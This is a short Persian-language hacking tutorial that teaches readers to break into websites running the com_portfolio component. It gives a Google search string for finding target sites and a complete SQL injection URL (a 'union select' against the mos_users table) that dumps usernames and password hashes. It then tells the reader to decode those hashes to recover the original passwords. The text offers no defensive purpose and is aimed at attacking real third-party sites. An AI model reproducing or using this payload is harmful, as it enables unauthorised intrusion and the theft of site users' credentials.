امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو گذاشتم!
این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای (com_portfolio) هستند به هک یوزر و پسورد کاربران این قبیل سایت ها بپردازید!
خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:
index.php?option=com_portfolio
حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:
index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*
حال مشاهده خواهید کرد که پسورد های کاربران سایت را به صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد های اصلی را به دست آورید!
